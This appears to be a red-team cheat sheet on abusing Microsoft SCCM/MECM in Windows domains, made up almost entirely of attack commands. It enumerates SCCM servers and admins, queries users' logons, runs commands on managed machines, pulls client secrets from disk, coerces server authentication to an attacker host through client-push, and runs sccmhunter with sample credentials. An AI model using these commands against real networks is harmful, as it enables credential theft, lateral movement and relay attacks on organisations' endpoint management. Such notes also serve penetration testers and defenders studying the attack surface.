SCCM Abuse
System Center Configuration Manager / Microsoft Endpoint Configuration Manager
Enumeration
Look for CcmExec.exe processes:
Cmd > tasklist | findstr CcmExecSearch for SCCM servers in LDAP:
PV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostNameVNC-like Remote Control (CmRcViewer Abuse)
Tools
MalSCCM
sccmwtf
SharpSCCM
Get SMS (Systems Management Server) and SC (Site Code):
Cmd > SharpSCCM.exe local site-infoList SCCM admins:
Cmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>List user latest logons (automated in sccmhound):
Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u [email protected]Get resource (server) ID:
Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>Execute WMI command on a resource:
Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>Grab secrets from SCCM client (locally):
Cmd > SharpSCCM.exe local secrets -m diskCoerce authentication from SCCM server (remotely):
Cmd > SharpSCCM.exe invoke client-push -t attacker.localsccmhunter
Install:
$ pipx install -f "git+https://github.com/garrettfoster13/sccmhunter.git"List user latest logons:
$ sccmhunter.py admin -u sccm_admin -p 'Passw0rd!' -ip SCCM.megacorp.local
$ get_lastlogon administratorLast updated